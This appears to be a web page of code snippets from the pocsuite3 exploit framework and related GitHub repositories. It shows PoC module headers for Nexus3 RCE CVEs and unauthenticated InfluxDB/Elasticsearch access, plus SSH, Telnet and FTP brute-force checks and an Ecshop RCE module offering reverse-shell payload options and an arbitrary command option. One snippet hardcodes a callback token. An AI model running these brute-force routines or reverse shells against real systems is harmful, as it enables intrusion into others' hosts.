How to use the pocsuite3.api.POC_CATEGORY function in pocsuite3



Source: shadowsock5/Poc — Nexus/Nexus_poc.py (GitHub)
from string import ascii_letters

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

'''
CVE-2019-7238
需要Nexus服务器上有资源(比如Jar包)
'''
class Nexus3_RCE_POC(POCBase):
    vulID = 'Nexus3-CVE-2019-7238'
    appName = 'Nexus3'
    appVersion = 'Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-02-05'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-02-20'  # 编写 PoC 的日期
    updateDate = '2020-02-17'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mp.weixin.qq.com/s/P1KC7wadbEZbHvavYQjbVA']  # 漏洞地址来源,0day不用写
    name = 'Nexus3 RCE'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner,通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)
Source: shadowsock5/Poc — Nexus/Nexus_CVE_2018_16621.py (GitHub)
from pocsuite3.lib.core.data import paths

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

'''
CVE-2018-16621: Nexus 3 EL injection
Admin access is required
'''
class Nexus3_2018_16621_EL_INJECTION_POC(POCBase):
    vulID = 'Nexus3-CVE-2018-16621'
    appName = 'Nexus3'
    appVersion = 'Nexus Repository Manager OSS/Pro <=3.13.0'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2018-10-18'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-03'  # 编写 PoC 的日期
    updateDate = '2020-04-07'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://support.sonatype.com/hc/en-us/articles/360010789153-CVE-2018-16621-Nexus-Repository-Manager-Java-Injection-October-17-2018']  # 漏洞地址来源,0day不用写
    name = 'Nexus3 EL injection'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"中危"

    
    # 使用随机字符串作为banner,计算数字之后返回
    ran1 = random.randint(1,100)

    ran2 = random.randint(100,200)
Source: shadowsock5/Poc — Unauth/influxdb_unauthorized_access.py (GitHub)
#!/usr/bin/env python
#coding=utf-8

import traceback

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class InfluxDB_POC(POCBase):
    vulID = 'InfluxDB-unauthorized-access'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    appName = 'InfluxDB'
    appVersion = ''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.INFORMATION_DISCLOSURE

    vulDate = '2020-04-13'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-13'  # 编写 PoC 的日期
    updateDate = '2020-04-13'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://github.com/chaitin/xray/blob/master/pocs/influxdb-unauth.yml']  # 漏洞地址来源,0day不用写
    name = 'InfluxDB未授权访问漏洞'  # PoC 名称
    cvss = u"高危"

    
    def _verify(self):
        result={}

        vul_url = self.url
        target_url = vul_url
Source: knownsec/pocsuite3 — pocsuite3/pocs/ssh_burst.py (GitHub)
version = '3'
    author = ['seebug']
    vulDate = '2018-09-18'
    createDate = '2018-09-18'
    updateDate = '2018-09-18'
    references = ['https://www.seebug.org/vuldb/ssvid-89688']
    name = 'SSH 弱密码'
    appPowerLink = ''
    appName = 'ssh'
    appVersion = 'All'
    vulType = VUL_TYPE.WEAK_PASSWORD
    desc = '''ssh 存在弱密码,导致攻击者可连接主机进行恶意操作'''
    samples = ['']
    install_requires = ['paramiko']
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.SSH

    def _verify(self):
        """Run the SSH weak-credential check against the configured target.

        ``rhost`` and ``rport`` are read from the global options (``rport``
        falls back to 22). A fresh task queue and result queue are handed to
        ``ssh_burst``; if the result queue holds a credential pair afterwards,
        it is reported under ``VerifyInfo`` together with ``self.url``.
        The report dict is passed through ``self.parse_attack`` before it is
        returned. Note that the recovered password is placed in the report in
        clear text, so the returned structure is itself sensitive.
        """
        target_host = self.getg_option("rhost")
        target_port = self.getg_option("rport") or 22

        pending = queue.Queue()
        found = queue.Queue()
        ssh_burst(target_host, target_port, pending, found)

        report = {}
        if not found.empty():
            # Only the first pair on the queue is reported; any further
            # entries are left unread, matching the original flow.
            user, secret = found.get()
            report['VerifyInfo'] = {
                'URL': self.url,
                'Username': user,
                'Password': secret,
            }
        return self.parse_attack(report)
Source: shadowsock5/Poc — Nexus/Nexus_CVE_2020_10204.py (GitHub)
from pocsuite3.lib.core.data import paths

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase, logger
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

'''
CVE-2020-10204: Nexus 3 EL injection
Admin access is required
'''
class Nexus3_2020_10204_EL_INJECTION_POC(POCBase):
    vulID = 'Nexus3-CVE-2020-10204'
    appName = 'Nexus3'
    appVersion = 'Nexus Repository Manager OSS/Pro <=3.21.1'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2020-04-01'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-03'  # 编写 PoC 的日期
    updateDate = '2020-04-03'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31']  # 漏洞地址来源,0day不用写
    name = 'Nexus3 EL injection'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner,计算数字之后返回
    ran1 = random.randint(1,100)

    ran2 = random.randint(100,200)
Source: knownsec/pocsuite3 — pocsuite3/pocs/telnet_burst.py (GitHub)
vulID = '89687'
    version = '3'
    author = ['seebug']
    vulDate = '2018-09-19'
    createDate = '2018-09-19'
    updateDate = '2018-09-19'
    references = ['https://www.seebug.org/vuldb/ssvid-89687']
    name = 'Telnet 弱密码'
    appPowerLink = ''
    appName = 'telnet'
    appVersion = 'All'
    vulType = VUL_TYPE.WEAK_PASSWORD
    desc = '''telnet 存在弱密码,导致攻击者可登录主机进行恶意操作'''
    samples = ['']
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.TELENT

    def _verify(self):
        """Check the target telnet service for a weak credential pair.

        ``rhost`` and ``rport`` come from the global options (``rport``
        defaults to 23). ``telnet_burst`` is called for its side effect only;
        the outcome is read from ``result_queue``, which is not defined in
        this method — presumably a module-level queue that ``telnet_burst``
        fills (confirm against the rest of the module). A recovered pair is
        reported under ``VerifyInfo`` with ``self.url``, and the dict is
        handed to ``self.parse_attack``. The password is stored in the report
        in clear text.
        """
        target_host = self.getg_option("rhost")
        target_port = self.getg_option("rport") or 23

        telnet_burst(target_host, target_port)

        report = {}
        if result_queue.empty():
            return self.parse_attack(report)

        # Only the first pair on the queue is reported.
        user, secret = result_queue.get()
        report['VerifyInfo'] = {
            'URL': self.url,
            'Username': user,
            'Password': secret,
        }
        return self.parse_attack(report)

    def _attack(self):
Source: shadowsock5/Poc — Unauth/elasticsearch_unauthorized_access.py (GitHub)
import traceback

# 将输入的url转换为ip:port,供socket使用
from pocsuite3.lib.utils import url2ip
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class Elasticsearch_POC(POCBase):
    vulID = 'Elasticsearch-unauthorized-access'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    appName = 'Elasticsearch'
    appVersion = ''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.INFORMATION_DISCLOSURE

    vulDate = '2020-04-17'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-17'  # 编写 PoC 的日期
    updateDate = '2020-04-17'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://github.com/chaitin/xray/blob/master/pocs/elasticsearch-unauth.yml', 'https://www.cnblogs.com/xiaozi/p/8275201.html']  # 漏洞地址来源,0day不用写
    name = 'Elasticsearch未授权访问漏洞'  # PoC 名称
    cvss = u"高危"


    '''
    poc检测两个特征,加强可靠性:
    1,GET访问根路径,返回es的slogan:`You Know, for Search`;
    2,GET访问`/_cat`,响应里有`/_cat/master`
    '''
Source: knownsec/pocsuite3 — pocsuite3/pocs/ftp_burst.py (GitHub)
vulID = '62522'
    version = '3'
    author = ['seebug']
    vulDate = '2013-11-21'
    createDate = '2013-11-21'
    updateDate = '2013-11-21'
    references = ['http://sebug.net/vuldb/ssvid-62522']
    name = 'FTP 弱密码'
    appPowerLink = ''
    appName = 'ftp'
    appVersion = 'All'
    vulType = VUL_TYPE.WEAK_PASSWORD
    desc = '''ftp 存在弱密码,导致攻击者可连接进行文件管理进行恶意操作'''
    samples = ['']
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.FTP

    def _verify(self):
        """Check the target FTP service for a weak credential pair.

        ``rhost`` and ``rport`` come from the global options (``rport``
        defaults to 21). ``ftp_burst`` is called for its side effect only;
        the outcome is read from ``result_queue``, which is not defined in
        this method — presumably a module-level queue that ``ftp_burst``
        fills (confirm against the rest of the module). A recovered pair is
        reported under ``VerifyInfo`` with ``self.url``, and the dict is
        handed to ``self.parse_attack``. The password is stored in the report
        in clear text.
        """
        target_host = self.getg_option("rhost")
        target_port = self.getg_option("rport") or 21

        ftp_burst(target_host, target_port)

        report = {}
        if result_queue.empty():
            return self.parse_attack(report)

        # Only the first pair on the queue is reported.
        user, secret = result_queue.get()
        report['VerifyInfo'] = {
            'URL': self.url,
            'Username': user,
            'Password': secret,
        }
        return self.parse_attack(report)

    def _attack(self):
Source: knownsec/pocsuite3 — pocsuite3/pocs/ecshop_rce.py (GitHub)
vulID = '97343'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2018-06-14'
    createDate = '2018-06-14'
    updateDate = '2018-06-14'
    references = ['https://www.seebug.org/vuldb/ssvid-97343']
    name = 'Ecshop 2.x/3.x Remote Code Execution'
    appPowerLink = ''
    appName = 'ECSHOP'
    appVersion = '2.x,3.x'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''近日,Ecshop爆出全版本SQL注入及任意代码执行漏洞,受影响的版本有:Ecshop 2.x,Ecshop 3.x-3.6.0'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    protocol = POC_CATEGORY.PROTOCOL.HTTP
    pocDesc = '''在攻击模式下,可以通过command参数来指定任意命令,app_version用于选定ecshop版本'''

    def _options(self):
        """Declare the PoC's user-configurable options.

        Returns an ``OrderedDict`` with three entries, in this order:
        ``command`` (an ``OptString`` defaulting to ``whoami``),
        ``app_version`` (an ``OptItems`` over ``2.x``/``3.x``/``Auto`` with
        ``Auto`` selected) and ``payload`` (an ``OptDict`` whose choices are
        the ``nc`` and ``bash`` entries of ``REVERSE_PAYLOAD``, ``bash``
        selected). Per the class-level ``pocDesc``, ``command`` is the
        operator-supplied command used in attack mode, so its value is not
        validated here.
        """
        return OrderedDict([
            ("command", OptString("whoami", description='攻击时自定义命令')),
            ("app_version", OptItems(['2.x', '3.x', 'Auto'], selected="Auto", description='目标版本,可自动匹配')),
            ("payload", OptDict(
                default={"nc": REVERSE_PAYLOAD.NC, "bash": REVERSE_PAYLOAD.BASH},
                selected="bash",
            )),
        ])

    def gen_ec2payload(self, phpcode):
        # ECShop 2.x payload
Source: knownsec/pocsuite3 — pocsuite3/pocs/ssh_burst.py (GitHub)
vulID = '89688'
    version = '3'
    author = ['seebug']
    vulDate = '2018-09-18'
    createDate = '2018-09-18'
    updateDate = '2018-09-18'
    references = ['https://www.seebug.org/vuldb/ssvid-89688']
    name = 'SSH 弱密码'
    appPowerLink = ''
    appName = 'ssh'
    appVersion = 'All'
    vulType = VUL_TYPE.WEAK_PASSWORD
    desc = '''ssh 存在弱密码,导致攻击者可连接主机进行恶意操作'''
    samples = ['']
    install_requires = ['paramiko']
    category = POC_CATEGORY.TOOLS.CRACK
    protocol = POC_CATEGORY.PROTOCOL.SSH

    def _verify(self):
        result = {}
        host = self.getg_option("rhost")
        port = self.getg_option("rport") or 22

        task_queue = queue.Queue()
        result_queue = queue.Queue()
        ssh_burst(host, port, task_queue, result_queue)
        if not result_queue.empty():
            username, password = result_queue.get()
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Username'] = username
            result['VerifyInfo']['Password'] = password